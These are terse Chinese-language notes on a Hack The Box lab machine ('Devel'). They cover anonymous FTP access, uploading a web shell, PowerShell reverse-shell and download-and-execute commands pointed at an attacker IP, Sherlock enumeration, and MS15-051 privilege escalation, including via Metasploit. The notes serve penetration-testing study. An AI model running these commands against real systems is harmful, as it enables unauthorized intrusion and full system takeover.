htb-window-3-Devel-ftp-ms-msf

nmap

ftp

• 匿名登陆
  
• 发现文件一样，推断该ftp是可以网址入口
  

shell反弹和提权

shell直接反弹

• 直接反弹不能持久-会失败
  
  

Invoke-Power反弹

cmdasp

• 上传cmdasp.aspx
  
  

• 测试
  

• 句末加入反弹语句

  Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.5 -Port 4444
  

  

• 靶机下载Invoke-PowerShellTcp.ps1

  powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5/Invoke-PowerShellTcp.ps1')"
  

  

  

system

• sherlock发现漏洞

  powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5/Sherlock.ps1'); Find-AllVulns"
  

  

• 生成木马exe
  

• 下载对应的ms-ms15-051
  
  

• 靶机下载ms和反弹shell(一般在C:\Users\Public)
  

• 获取flag
  

msf

反弹shell

• 木马和ftp上传
  

• 监听
  

system

• 查看漏洞
  
• 选ms15_051漏洞进行提权